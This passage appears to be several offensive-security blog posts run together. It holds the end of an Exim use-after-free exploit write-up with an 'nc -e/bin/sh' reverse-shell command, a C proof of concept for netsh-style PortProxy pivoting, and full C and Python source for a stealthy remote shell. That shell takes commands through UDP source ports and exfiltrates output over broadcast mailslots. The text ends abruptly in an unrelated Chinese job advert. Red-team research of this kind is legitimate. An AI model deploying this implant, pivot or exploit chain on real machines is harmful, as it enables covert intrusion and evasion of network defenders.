for(i = 16; read(fd, buf, sizeof(buf)) > 0 && i > 0; ) i--;
}
cancel_cutthrough_connection(TRUE, US"message setup dropped");
search_tidyup();
smtp_log_no_mail(); /* Log no mail if configured */
/*XXX should we pause briefly, hoping that the client will be the
active TCP closer hence get the TCP_WAIT endpoint? */
DEBUG(D_receive) debug_printf("SMTP>>(close on process exit)\n");
_exit(rc ? EXIT_FAILURE : EXIT_SUCCESS);
}
We can see that there is a possibility to return back to smtp_setup_msg()
with an increased reset_point
.
When reading a message, the return value ok
must be true, but we, somehow need to make message_id[0] == 0
. This happen on an specific situation.
Let’s read the receive_msg()
code:
/* Handle failure due to a humungously long header section. The >= allows
for the terminating \n. Add what we have so far onto the headers list so
that it gets reflected in any error message, and back up the just-read
character. */
if (message_size >= header_maxsize)
{
OVERSIZE:
next->text[ptr] = 0;
next->slen = ptr;
next->type = htype_other;
next->next = NULL;
header_last->next = next;
header_last = next;
log_write(0, LOG_MAIN, "ridiculously long message header received from "
"%s (more than %d characters): message abandoned",
f.sender_host_unknown ? sender_ident : sender_fullhost, header_maxsize);
if (smtp_input)
{
smtp_reply = US"552 Message header is ridiculously long";
receive_swallow_smtp();
goto TIDYUP; /* Skip to end of function */
}
else
{
give_local_error(ERRMESS_VLONGHEADER,
string_sprintf("message header longer than %d characters received: "
"message not accepted", header_maxsize), US"", error_rc, stdin,
header_list->next);
/* Does not return */
}
}
If on a message, we send a really long line (no \n
’s on it) surpassing header_maxsize
, an error happens.
Despite being an error, ok
on return is true, but message_id[0]
contains 0
:)
This means on handle_smtp_call()
we will follow the continue
and return back to smtp_setup_msg()
with an increased reset_point
.
Qualys did the corrupting of the struct with AUTH
parameter (part of ESMTP parameters).
It is a good way to overwrite as it allows you to encode binary data as strings with xtext
. That string will be decoded as binary data on writing to the allocated buffer.
Though, I did not followed that way. I used the message channel itself to send binary data, and I had no problems with it.
So I was able to overwrite the struct through a message and control all the parameters in the struct.
We now know the address where the target configuration is stored.
By using the same technique I used for overwriting the target gstring
struct, we can do the same but to craft a write-what-where primitive.
This time corked->size
must be a high value. corked->ptr
must be zero in order to start writing response on corked->s
directly.
corked->s
will contain the address where we want to write the response of our command triggering the UAF.
Once we overwrite the gstring
struct with such values, we need to trigger the Use-After-Free initializing again a TLS Session.
We send an invalid MAIL FROM
command so part of our command is returned on the response, which allows us to write arbitrary data.
ACL is overwritten by our custom command, how do we make it be executed?
Once the ACL is corrupted, in this case I overwrote the ACL corresponding to MAIL FROM
commands, we need to make that ACL being interpreted by expand_cstring()
. To do so, after the MAIL FROM
we used to overwrite the ACL we can pipeline another command (MAIL FROM
too as the previous one failed) which will make the ACL being passed to expand_cstring()
and the command will finally be executed.
I had a problem with max arguments. I could not nc -e/bin/sh <ip> <port>
, just two args were allowed. So I used this as command: /bin/sh -c 'nc -e/bin/sh <ip> <port>'
.
Now it won’t give us max_args problem and the command will be executed, resulting on a reverse shell:
The full exploit can be found here.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is a call to an (un)holy crusade: we have to banish the usage of commands in compromised machines and start to embrace coding. Please, take a seat and listen to the story of netsh and PortProxy.
The intention of this short article is to encourage people to improve their tradecraft. We use netsh here as a mere example to transmit the core idea: we need to move from commands to tasks coded in our implants/tools.
There are tons of ways to tunnel your traffic through a compromised machine. Probably the most common can be dropping an implant that implements a SOCKS4/5 proxy, so you can route your traffic through that computer and run your tools against other network segments previously inaccessible. But in some scenarios we can’t just deploy our socks proxy listening to an arbitrary port and we need to rely on native tools, like the well-known netsh.
Forwarding traffic from one port to another machine is trivial with netsh. For example, if we want to connect to the RDP service exposed by a server (let’s call it C) at 10.2.0.12 and we need to use B (10.1.0.233) as pivot, the command line would look like:
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=0.0.0.0 connectport=3389 connectaddress=10.2.0.12
Then we only need to use our favorite RDP client and point it to B (10.1.0.233) at port 1337. Easy peachy.
But… how netsh works and what is happening under the hood? Can we implement this functionality by ourselves so we can avoid the use of the well-known netsh?
The first thing to do (after googling) when we have to play with something in Windows is to take a look at ReactOS and Wine projects (usually both are a goldmine) but this time we were unlucky:
#include "wine/debug.h"
WINE_DEFAULT_DEBUG_CHANNEL(netsh);
int __cdecl wmain(int argc, WCHAR *argv[])
{
int i;
WINE_FIXME("stub:");
for (i = 0; i < argc; i++)
WINE_FIXME(" %s", wine_dbgstr_w(argv[i]));
WINE_FIXME("\n");
return 0;
}
So let’s try to execute netsh and take a look at it with Process Monitor:
In Process Monitor the only thing that is related to “PortProxy” is the creation of a value with the forwarding info (source an destination) inside the key HKLM\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
. If we google this key we can find a lot of articles talking about DFIR and how this key can be used to detect this particular TTP in forensic analysis (for example: Port Proxy detection - How can we see port proxy configurations in DFIR?).
If we create manually this registry value nothing happens, so we need something more to trigger the proxy creation. What are we missing? Well, that question is easy to answer. Let’s see what happened with our previous netsh execution with TCPView:
As we can see iphlpsvc (IP Helper Service) is in charge to create the “portproxy”. So netsh should “contact” this service in order to trigger the proxy creation, but how is this done? We should open iphlpsvc.dll inside Binary Ninja and look for references to “PortProxy”. (Spoiler: it is using the paramchange
control code, so we can trigger it with sc
easily)
We have a hit with a registry key similar to the one that we were looking for…
…so we can start the old and dirty game of following the call cascade (cross-reference party!) until we reach something really interesting (Note: OnConfigChange
is a function renamed by us):
We got it! If a paramchange
control code arrives to the iphlpsvc
, it is going to read again the PortProxy configuration from the registry and act according to the info retrieved.
We can translate netsh
PortProxy into the creation of a registry key and then sending a paramchange
control code to the IP Helper service, or in other words we can execute these commands:
reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp /t REG_SZ /v 0.0.0.0/49777 /d 192.168.8.128/80
sc control iphlpsvc paramchange
reg delete HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4 /f
It’s time to translate our commands into a shitty PoC in C:
// PortProxy PoC
// @TheXC3LL
#include <Windows.h>
#include <stdio.h>
DWORD iphlpsvcUpdate(void) {
SC_HANDLE hManager;
SC_HANDLE hService;
SERVICE_STATUS serviceStatus;
DWORD retStatus = 0;
DWORD ret = -1;
hManager = OpenSCManagerA(NULL, NULL, GENERIC_READ);
if (hManager) {
hService = OpenServiceA(hManager, "IpHlpSvc", SERVICE_PAUSE_CONTINUE | SERVICE_QUERY_STATUS);
if (hService) {
printf("[*] Connected to IpHlpSvc\n");
retStatus = ControlService(hService, SERVICE_CONTROL_PARAMCHANGE, &serviceStatus);
if (retStatus) {
printf("[*] Configuration update requested\n");
ret = 0;
}
else {
printf("[!] ControlService() failed!\n");
}
CloseServiceHandle(hService);
CloseServiceHandle(hManager);
return ret;
}
CloseServiceHandle(hManager);
printf("[!] OpenServiceA() failed!\n");
return ret;
}
printf("[!] OpenSCManager() failed!\n");
return ret;
}
DWORD addEntry(LPSTR source, LPSTR destination) {
LPCSTR v4tov4 = "SYSTEM\\ControlSet001\\Services\\PortProxy\\v4tov4\\tcp";
HKEY hKey = NULL;
LSTATUS retStatus = 0;
DWORD ret = -1;
retStatus = RegCreateKeyExA(HKEY_LOCAL_MACHINE, v4tov4, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (retStatus == ERROR_SUCCESS) {
retStatus = (RegSetValueExA(hKey, source, 0, REG_SZ, (LPBYTE)destination, strlen(destination) + 1));
if (retStatus == ERROR_SUCCESS) {
printf("[*] New entry added\n");
ret = 0;
}
else {
printf("[!] RegSetValueExA() failed!\n");
}
RegCloseKey(hKey);
return ret;
}
printf("[!] RegCreateKeyExA() failed!\n");
return ret;
}
DWORD deleteEntry(LPSTR source) {
LPCSTR v4tov4 = "SYSTEM\\ControlSet001\\Services\\PortProxy\\v4tov4\\tcp";
HKEY hKey = NULL;
LSTATUS retStatus = 0;
DWORD ret = -1;
retStatus = RegCreateKeyExA(HKEY_LOCAL_MACHINE, v4tov4, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (retStatus == ERROR_SUCCESS) {
retStatus = RegDeleteKeyValueA(HKEY_LOCAL_MACHINE, v4tov4, source);
if (retStatus == ERROR_SUCCESS) {
printf("[*] New entry deleted\n");
ret = 0;
}
else {
printf("[!] RegDeleteKeyValueA() failed!\n");
}
RegCloseKey(hKey);
return ret;
}
printf("[!] RegCreateKeyExA() failed!\n");
return ret;
}
int main(int argc, char** argv) {
printf("\t\t-=<[ PortProxy PoC by @TheXC3LL ]>=-\n\n");
if (argc <= 2) {
printf("[!] Invalid syntax! Usage: PortProxy.exe SOURCE_IP/PORT DESTINATION_IP/PORT (example: ./PortProxy.exe 0.0.0.0/1337 10.0.2.2/22\n");
}
if (addEntry(argv[1], argv[2]) != -1) {
if (iphlpsvcUpdate() == -1) {
printf("[!] Something went wrong :S\n");
}
if (deleteEntry(argv[1]) == -1) {
printf("[!] Troubles deleting the entry, please try it manually!!\n");
}
}
return 0;
}
Fire in the hole!
EDIT (2021/06/19): A reader pointed us that “Control001” is the “normal” controlset, but in some scenarios the number can change (002, 003, etc.) so instead of using it directly we should use HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet before.
As we stated at the beginning this short article is not about “netsh” or the “PortProxy” functionality. We aim higher: we want to encourage you to stop using commands blindly and to start to dig inside what is doing your machine. Explore and learn the internals of everything you do on an red team operation or a pentest.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about how a fool started to play with the idea of controlling a shell remotely without listening to any port (bind shell), or doing a connection back to it (reverse shell). Please, take a seat and listen to the story of a journey to the No-Sockets Land.
Of course, declaring that we can communicate with other machine without sockets it’s a tricky afirmation: sockets, in a way or another, are needed. We are going to explore the usage of two covert-channels to trasmit information to and from our remote shell, so there are no “direct connections” between the two machines (or in other words: our implant is not going to bind to a local port and it is not going to connect back to our machine, we are going to explore an alternative way. Just have fun and don’t be harsh on us because we used the term “connectionless” :P
This post came after crafting a small PoC to satisfy our curiosity. The tactic of keeping a few compromised machines “quiet” (without communication with the C2) until a pre-shared combination of ports are hit is something that @TheXC3LL shared in his article “Stealthier communications & Port Knocking via Windows Filtering Platform (WFP)”.
In the article our owl explained how some “clean boxes” are left behind until its retake is needed. When the Red Team needs to reactivate the communication with its implant they just “knock” on a few predefined ports and the implant wakes up again. To do this the implant uses the Windows Filtering Platform APIs in order to monitor the firewall events and to check for incomming UDP packets (source and destionation port/ip), if the predefined condition is met then it connects back to a fallback C2 or just fire a reverse shell.
Here, in our PoC, we are going to use this technique partially. As we do not want to “create” a socket in the compromised machine, and we need to communicate with our implant in some way, we use a wicked approach based on Port Knocking. Or we should call it “reverse” Port Knocking.
Instead of “knocking” at different ports, we “knock” only in a port but we change the source port. And this source port is our covert-channel: we can use those two bytes to transmit information. So here is the thing… the events collected from WFP are our inbound channel.
We just found a way to transmit information to our implant, but how are we going to exfiltrate the output of our inputs/commands? Well, here is where Mailslots take in action. From Microsoft:
A mailslot is a mechanism for one-way interprocess communications (IPC). Applications can store messages in a mailslot. (...). These messages are typically sent over a network to either a specified computer **or to all computers in a specified domain**. (...)
(...) Mailslots, on the other hand, are a simple way for a process to broadcast messages to multiple processes. One important consideration is that mailslots broadcast messages using datagrams. A datagram is a small packet of information that the network sends along the wire. Like a radio or television broadcast, a datagram offers no confirmation of receipt; there is no way to guarantee that a datagram has been received.(...)
Ok, we can use mailslots to broadcast the output over the network and then wait patiently in our end in order to read the output. Where is the fun? Well… every Windows is using mailslots continously. Your machine is broadcasting datagrams like a minigun. Have you ever found those “BROWSER” packets in Wireshark?
Yep, the CIFS Browser protocol uses the mailslot \MAILSLOT\BROWSE, so we can smuggle the output of our shell here. This is gonna be our outbound channel.
After this brief introduction, let’s dig a bit!
As first contact we can reuse the code to monitor the events and add a minor edit to print the source ports:
#include <windows.h>
#include <fwpmtypes.h>
#include <fwpmu.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib, "fwpuclnt.lib")
#pragma comment (lib, "Ws2_32.lib")
#define EXIT_ON_ERROR(err) if((err) != ERROR_SUCCESS) {goto CLEANUP;}
FILETIME ft;
DWORD InitFilterConditions(
__in_opt PCWSTR appPath,
__in_opt const SOCKADDR* localAddr,
__in_opt UINT8 ipProtocol,
__in UINT32 numCondsIn,
__out_ecount_part(numCondsIn, *numCondsOut) FWPM_FILTER_CONDITION0* conds,
__out UINT32* numCondsOut,
__deref_out FWP_BYTE_BLOB** appId
)
{
*numCondsOut = 0;
return ERROR_SUCCESS;
}
DWORD FindRecentEvents(
__in HANDLE engine,
__in_opt PCWSTR appPath,
__in_opt const SOCKADDR* localAddr,
__in_opt UINT8 ipProtocol,
__in UINT32 seconds,
__deref_out_ecount(*numEvents) FWPM_NET_EVENT0*** events,
__out UINT32* numEvents
)
{
DWORD result = ERROR_SUCCESS;
FWPM_NET_EVENT_ENUM_TEMPLATE0 enumTempl;
ULARGE_INTEGER ulTime;
FWPM_FILTER_CONDITION0 conds[4];
UINT32 numConds;
FWP_BYTE_BLOB* appBlob = NULL;
HANDLE enumHandle = NULL;
memset(&enumTempl, 0, sizeof(enumTempl));
// Use the current time as the end time of the window.
GetSystemTimeAsFileTime(&(enumTempl.endTime));
// Subtract the number of seconds specified by the caller to find the start
// time.
ulTime.LowPart = enumTempl.endTime.dwLowDateTime;
ulTime.HighPart = enumTempl.endTime.dwHighDateTime;
ulTime.QuadPart -= seconds * 10000000ui64;
enumTempl.startTime.dwLowDateTime = ulTime.LowPart;
enumTempl.startTime.dwHighDateTime = ulTime.HighPart;
result = InitFilterConditions(
appPath,
&localAddr,
ipProtocol,
ARRAYSIZE(conds),
conds,
&numConds,
&appBlob
);
EXIT_ON_ERROR(result);
enumTempl.numFilterConditions = numConds;
if (numConds > 0)
{
enumTempl.filterCondition = conds;
}
result = FwpmNetEventCreateEnumHandle0(
engine,
&enumTempl,
&enumHandle
);
EXIT_ON_ERROR(result);
result = FwpmNetEventEnum0(
engine,
enumHandle,
INFINITE,
events,
numEvents
);
EXIT_ON_ERROR(result);
CLEANUP:
FwpmNetEventDestroyEnumHandle0(engine, enumHandle);
FwpmFreeMemory0((void**)&appBlob);
return result;
}
LPSTR detectHit(void) {
struct in_addr rinaddr;
HANDLE engineHandle = 0;
FWPM_NET_EVENT0** events = NULL, * event;
UINT32 numEvents = 0, i;
static const char* const types[] =
{
"FWPM_NET_EVENT_TYPE_IKEEXT_MM_FAILURE",
"FWPM_NET_EVENT_TYPE_IKEEXT_QM_FAILURE",
"FWPM_NET_EVENT_TYPE_IKEEXT_EM_FAILURE",
"FWPM_NET_EVENT_TYPE_CLASSIFY_DROP",
"FWPM_NET_EVENT_TYPE_IPSEC_KERNEL_DROP"
};
const char* type;
// Use dynamic sessions for efficiency and safety:
// - All objects associated with the dynamic session are deleted with one call.
// - Filtering policy objects are deleted even when the application crashes.
FWPM_SESSION0 session;
memset(&session, 0, sizeof(session));
session.flags = FWPM_SESSION_FLAG_DYNAMIC;
DWORD result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_WINNT, NULL, &session, &engineHandle);
if (ERROR_SUCCESS == result)
{
result = FindRecentEvents(
engineHandle,
0,
0,
0,
100,
&events,
&numEvents
);
}
if (numEvents != 0)
{
for (i = 0; i < numEvents; ++i)
{
event = events[i];
type = (event->type < ARRAYSIZE(types)) ? types[event->type]
: "<unknown>";
if (event->header.ipVersion == FWP_IP_VERSION_V4 && event->header.ipProtocol == IPPROTO_UDP
&& (event->header.timeStamp.dwHighDateTime > ft.dwHighDateTime
|| (event->header.timeStamp.dwHighDateTime == ft.dwHighDateTime && event->header.timeStamp.dwLowDateTime > ft.dwLowDateTime)
)
)
{
rinaddr.s_addr = htonl(event->header.remoteAddrV4);
ft.dwHighDateTime = event->header.timeStamp.dwHighDateTime;
ft.dwLowDateTime = event->header.timeStamp.dwLowDateTime;
//printf("[%s] - %x - %x\n", inet_ntoa(rinaddr), event->header.localPort, event->header.remotePort);
char partialOut[3] = { 0 };
memcpy(partialOut, &event->header.remotePort, 2);
printf("%s", partialOut);
}
}
}
}
int main(int argc, char** argv[]) {
ft.dwHighDateTime = 0;
ft.dwLowDateTime = 0;
for (;;) {
detectHit();
Sleep(1000);
}
return 0;
}
Now we can try to send packets against a predefined port (for example, 123/UDP), encoding a message inside the source ports. Keep in mind that we don’t care about the content because our information is carried as the source port (this means: please, try to make the payload as similar as possible to a real and “regular” packet based in the protocol that you are trying to simulate).
import sys
from scapy.all import *
def textToPorts(text):
chunks = [text[i:i+2] for i in range(0, len(text), 2)]
for chunk in chunks:
send(IP(dst=sys.argv[1])/UDP(dport=123,sport=int("0x" + chunk[::-1].encode("hex"), 16))/Raw(load="Use stealthier packet in a real operation, pls"))
if __name__ == "__main__":
while 1:
command = raw_input("Insert text> ")
textToPorts(command)
We can see how it worked like a charm:
Right now we can listen without ears sockets. Let’s move to the next task!
Working with mailslots is pretty easy. We only need to open a handle to \\*\MAILSLOT\BROWSE
and write inside it like we do with regular files. The \\*\
indicates that the message has to be broadcasted to the whole domain.
As any protocol, we have to keep some kind of “structure” to avoid crafting a malformed packet in excess. Luckily for us, CIFS BROWSER protocol is very lazy and we can find a suitable request easy. To look for our candidates we can just loop from 0x00 to 0xFF and write it over the handle:
#include <windows.h>
#include <stdio.h>
int main(int argc, char** argv) {
HANDLE hMailslot = NULL;
DWORD dwWritten;
hMailslot = CreateFileA("\\\\*\\MAILSLOT\\BROWSE", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
for (int i = 0x00; i < 0xFF; i++) {
char message[14] = { 0 };
snprintf(message, 14, "%cHello World!",i);
WriteFile(hMailslot, message, 14, &dwWritten, NULL);
}
CloseHandle(hMailslot);
return 0;
}
As we can see most of the messages are interpreted as “malformed packets” or are undefined in the protocol standard:
The best candidate looks like to be the GetBackupListRequest command. It uses the 0x09
as opcode:
To retrieve the information at our end we can sniff the network using Scapy:
# ...
def getPacket(pkt):
needle = "BROWSE\x00\x00\x00\x09"
data = pkt[Raw].load
if needle in data:
sys.stdout.write(data[data.find(needle) + len(needle):])
sys.stdout.flush()
def monitor():
sniff(prn=getPacket, filter="port 138 and host " + sys.argv[1], iface=sys.argv[2])
# ...
Before continuing we need to clarify some points that are to be taken into consideration. The most important: this kind of approach will only work if there is no network elements that could mask the source port. In complex infrastructures you need to be close (usually in the same network segment) in order to perform this technique. If a NAT-like device sits between you and the sleeping box it is most likely that the information encoded as source port is going to be overwritten.
Secondly, in our PoC we are just using one port to transfer the information for the sake of brevity. In a real implant, you need to knock at least three different ports:
Also something really, really, really important: when the first port is hit (the “wake up”) we have to save the IP which contacted us, and then use it as criteria to meet in our events of reading inputs. This matters a lot to avoid the insertion of corrupted data because we are reading stray packets from other machines. We need to match the port choosen to carry the input AND the IP who made us wake up.
For this very same reason to wake up we need to add an extra condition: not only a selected port has to be knocked, the source port has to be one that would not be used in a natural environment (for example 666).
Lastly we have to keep in mind that mailslots are size limited. We only can send 424 bytes per message.
After all this chit-chat let’s play a bit with our shitty PoC. Here comes the client:
# PoC by Juan Manuel Fernandez (@TheXC3LL)
import sys
import threading
from scapy.all import *
def textToPorts(text):
chunks = [text[i:i+2] for i in range(0, len(text), 2)]
for chunk in chunks:
send(IP(dst=sys.argv[1])/UDP(dport=123,sport=int("0x" + chunk[::-1].encode("hex"), 16))/Raw(load="Adepts of 0xCC here to make some noise, avoid this kind of obvious malformed packet with stupid messages ;)"), verbose=False)
def getPacket(pkt):
needle = "BROWSE\x00\x00\x00\x09"
data = pkt[Raw].load
if needle in data:
sys.stdout.write(data[data.find(needle) + len(needle):])
sys.stdout.flush()
def monitor():
sniff(prn=getPacket, filter="port 138 and host " + sys.argv[1], iface=sys.argv[2])
if __name__ == "__main__":
x = threading.Thread(target=monitor)
x.start()
while 1:
command = raw_input()
textToPorts(command + "\r\n")
And here the other part:
/* PoC by Juan Manuel Fernandez (@TheXC3LL) */
#include <windows.h>
#include <fwpmtypes.h>
#include <fwpmu.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib, "fwpuclnt.lib")
#pragma comment (lib, "Ws2_32.lib")
#define EXIT_ON_ERROR(err) if((err) != ERROR_SUCCESS) {goto CLEANUP;}
#define BUFFER_SIZE 400
FILETIME ft;
struct child_pipes {
HANDLE child_IN_R;
HANDLE child_IN_W;
HANDLE child_OUT_R;
HANDLE child_OUT_W;
};
typedef struct child_pipes child_pipes;
DWORD InitFilterConditions(
__in_opt PCWSTR appPath,
__in_opt const SOCKADDR* localAddr,
__in_opt UINT8 ipProtocol,
__in UINT32 numCondsIn,
__out_ecount_part(numCondsIn, *numCondsOut) FWPM_FILTER_CONDITION0* conds,
__out UINT32* numCondsOut,
__deref_out FWP_BYTE_BLOB** appId
)
{
*numCondsOut = 0;
return ERROR_SUCCESS;
}
DWORD FindRecentEvents(
__in HANDLE engine,
__in_opt PCWSTR appPath,
__in_opt const SOCKADDR* localAddr,
__in_opt UINT8 ipProtocol,
__in UINT32 seconds,
__deref_out_ecount(*numEvents) FWPM_NET_EVENT0*** events,
__out UINT32* numEvents
)
{
DWORD result = ERROR_SUCCESS;
FWPM_NET_EVENT_ENUM_TEMPLATE0 enumTempl;
ULARGE_INTEGER ulTime;
FWPM_FILTER_CONDITION0 conds[4];
UINT32 numConds;
FWP_BYTE_BLOB* appBlob = NULL;
HANDLE enumHandle = NULL;
memset(&enumTempl, 0, sizeof(enumTempl));
// Use the current time as the end time of the window.
GetSystemTimeAsFileTime(&(enumTempl.endTime));
// Subtract the number of seconds specified by the caller to find the start
// time.
ulTime.LowPart = enumTempl.endTime.dwLowDateTime;
ulTime.HighPart = enumTempl.endTime.dwHighDateTime;
ulTime.QuadPart -= seconds * 10000000ui64;
enumTempl.startTime.dwLowDateTime = ulTime.LowPart;
enumTempl.startTime.dwHighDateTime = ulTime.HighPart;
result = InitFilterConditions(
appPath,
&localAddr,
ipProtocol,
ARRAYSIZE(conds),
conds,
&numConds,
&appBlob
);
EXIT_ON_ERROR(result);
enumTempl.numFilterConditions = numConds;
if (numConds > 0)
{
enumTempl.filterCondition = conds;
}
result = FwpmNetEventCreateEnumHandle0(
engine,
&enumTempl,
&enumHandle
);
EXIT_ON_ERROR(result);
result = FwpmNetEventEnum0(
engine,
enumHandle,
INFINITE,
events,
numEvents
);
EXIT_ON_ERROR(result);
CLEANUP:
FwpmNetEventDestroyEnumHandle0(engine, enumHandle);
FwpmFreeMemory0((void**)&appBlob);
return result;
}
void getCommand(struct child_pipes* pipes) {
struct in_addr rinaddr;
HANDLE engineHandle = 0;
FWPM_NET_EVENT0** events = NULL, * event;
UINT32 numEvents = 0, i;
static const char* const types[] =
{
"FWPM_NET_EVENT_TYPE_IKEEXT_MM_FAILURE",
"FWPM_NET_EVENT_TYPE_IKEEXT_QM_FAILURE",
"FWPM_NET_EVENT_TYPE_IKEEXT_EM_FAILURE",
"FWPM_NET_EVENT_TYPE_CLASSIFY_DROP",
"FWPM_NET_EVENT_TYPE_IPSEC_KERNEL_DROP"
};
const char* type;
// Use dynamic sessions for efficiency and safety:
// - All objects associated with the dynamic session are deleted with one call.
// - Filtering policy objects are deleted even when the application crashes.
FWPM_SESSION0 session;
memset(&session, 0, sizeof(session));
session.flags = FWPM_SESSION_FLAG_DYNAMIC;
DWORD result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_WINNT, NULL, &session, &engineHandle);
if (ERROR_SUCCESS == result)
{
result = FindRecentEvents(
engineHandle,
0,
0,
0,
100,
&events,
&numEvents
);
}
if (numEvents != 0)
{
for (i = 0; i < numEvents; ++i)
{
event = events[i];
type = (event->type < ARRAYSIZE(types)) ? types[event->type]
: "<unknown>";
if (event->header.ipVersion == FWP_IP_VERSION_V4 && event->header.ipProtocol == IPPROTO_UDP
&& (event->header.timeStamp.dwHighDateTime > ft.dwHighDateTime
|| (event->header.timeStamp.dwHighDateTime == ft.dwHighDateTime && event->header.timeStamp.dwLowDateTime > ft.dwLowDateTime)
)
)
{
rinaddr.s_addr = htonl(event->header.remoteAddrV4);
ft.dwHighDateTime = event->header.timeStamp.dwHighDateTime;
ft.dwLowDateTime = event->header.timeStamp.dwLowDateTime;
//printf("[%s] - %x - %x\n", inet_ntoa(rinaddr), event->header.localPort, event->header.remotePort);
char partialOut[3] = { 0 };
memcpy(partialOut, &event->header.remotePort, 2);
printf("%s", partialOut);
write_to_pipe(pipes->child_IN_W, partialOut);
}
}
}
}
struct child_pipes* setup_pipes(void) {
struct child_pipes* pipes = NULL;
SECURITY_ATTRIBUTES saAttr;
saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
saAttr.bInheritHandle = TRUE;
saAttr.lpSecurityDescriptor = NULL;
pipes = (child_pipes*)malloc(sizeof(child_pipes));
if (!CreatePipe(&pipes->child_OUT_R, &pipes->child_OUT_W, &saAttr, 0)) {
return -1;
}
if (!CreatePipe(&pipes->child_IN_R, &pipes->child_IN_W, &saAttr, 0)) {
return -1;
}
if (!SetHandleInformation(pipes->child_OUT_R, HANDLE_FLAG_INHERIT, 0)) {
return -1;
}
if (!SetHandleInformation(pipes->child_IN_W, HANDLE_FLAG_INHERIT, 0)) {
return -1;
}
return pipes;
}
void release_pipes(struct child_pipes* pipes) {
free(pipes);
}
int read_from_pipe(HANDLE pipe, LPSTR buff) {
BOOL bSuccess;
DWORD read;
if (!PeekNamedPipe(pipe, NULL, 0, NULL, &read, NULL)) {
return -1;
}
if (read) {
bSuccess = ReadFile(pipe, buff, BUFFER_SIZE, &read, NULL);
if (!bSuccess) {
return -1;
}
}
return read;
}
int write_to_pipe(HANDLE pipe, LPSTR buff) {
BOOL bSuccess;
DWORD written;
bSuccess = WriteFile(pipe, buff, strlen(buff), &written, NULL);
if (!bSuccess) {
return -1;
}
return written;
}
int create_childprocess(LPSTR binary, struct child_pipes* pipes) {
PROCESS_INFORMATION piProcInfo;
STARTUPINFOA siStartInfo = { 0 };
BOOL bSuccess = FALSE;
siStartInfo.cb = sizeof(STARTUPINFOA);
siStartInfo.hStdError = pipes->child_OUT_W;
siStartInfo.hStdOutput = pipes->child_OUT_W;
siStartInfo.hStdInput = pipes->child_IN_R;
siStartInfo.dwFlags |= STARTF_USESTDHANDLES;
bSuccess = CreateProcessA(NULL,
binary,
NULL,
NULL,
TRUE,
0,
NULL,
NULL,
&siStartInfo,
&piProcInfo
);
if (!bSuccess) {
return -1;
}
CloseHandle(pipes->child_OUT_W);
CloseHandle(pipes->child_IN_R);
return piProcInfo.hProcess;
}
void sendOutput(LPSTR output, HANDLE hMailslot) {
char message[BUFFER_SIZE + 2] = { 0 };
DWORD dwWritten = 0;
snprintf(message, BUFFER_SIZE + 2, "\x09%s", output);
WriteFile(hMailslot, message, strlen(message) + 1, &dwWritten, NULL);
return;
}
int main(int argc, char** argv[]) {
ft.dwHighDateTime = 0;
ft.dwLowDateTime = 0;
int status = 0;
char buffer_stdout[BUFFER_SIZE + 1] = { 0 };
struct child_pipes* pipes = NULL;
int process = 0;
HANDLE hMailslot = NULL;
pipes = setup_pipes();
hMailslot = CreateFileA("\\\\*\\MAILSLOT\\BROWSE", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if ((process = create_childprocess("C:\\windows\\system32\\cmd.exe", pipes)) == -1) {
release_pipes(pipes);
return -1;
}
while (1) {
GetExitCodeProcess(process, &status);
if (status != STILL_ACTIVE) {
break;
}
do {
memset(buffer_stdout, 0, sizeof(buffer_stdout));
status = read_from_pipe(pipes->child_OUT_R, buffer_stdout);
if (status == -1) {
break;
}
else {
if (strlen(buffer_stdout) != 0) {
sendOutput(buffer_stdout, hMailslot);
}
}
} while (status != 0);
Sleep(300);
getCommand(pipes);
}
return 0;
}
Execute the python script in your linux machine, and then fire the executable in the Windows machine as a privileged user. A shell should arrive :):
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
戴夫寇爾已成立近九年,過去我們不斷地鑽研進階攻擊技巧,為許多客戶提供高品質的滲透測試服務,也成為客戶最信賴的資安伙伴之一。在 2017 年我們更成為第一個在台灣推出紅隊演練服務的本土廠商,透過無所不用其極的駭客思維,陸續為電子商務、政府部門、金融業者執行最真實且全面的攻擊演練,同時也累積了豐富的經驗與案例,成為台灣紅隊演練實力最深厚的服務供應商。
隨著公司規模擴大,我們首度公開招募紅隊演練人才,希望能夠找到一至兩位 Support 紅隊演練工程師,擴大我們的後勤能量,鞏固戴夫寇爾的團隊作戰能力,讓我們持續為企業提供最優異的資安服務。
我們非常渴望您的加入,若您有意成為戴夫寇爾的一員,可參考下列職缺細節:
在滲透測試、紅隊演練專案中擔任重要的後勤工作。這會是最清楚全局戰況的角色,需要觀察、記錄整體戰況,細心且耐心地整理繁雜的戰局資訊,並且樂於與作戰夥伴溝通現有戰況。檢測結束後需要將完整的戰況資訊和檢測過程中發現的弱點彙整成報告和簡報,讓客戶清楚理解弱點技術細節與成因,且可依據技術細節重現已發現的弱點,最後協助檢測客戶的修補狀況。
10:00 - 18:00 (中間休息 1 小時 13:00 - 14:00)
台北市中山區復興北路 168 號 10 樓 近期會搬遷至台北田徑場附近(捷運台北小巨蛋站)
新辦公室裝潢中,可參考之前的徵才文,未來辦公室會優於過去。
我們注重公司每位同仁的身心健康,請參考以下福利制度:
新台幣 60,000 - 80,000 (保證年薪 14 個月)
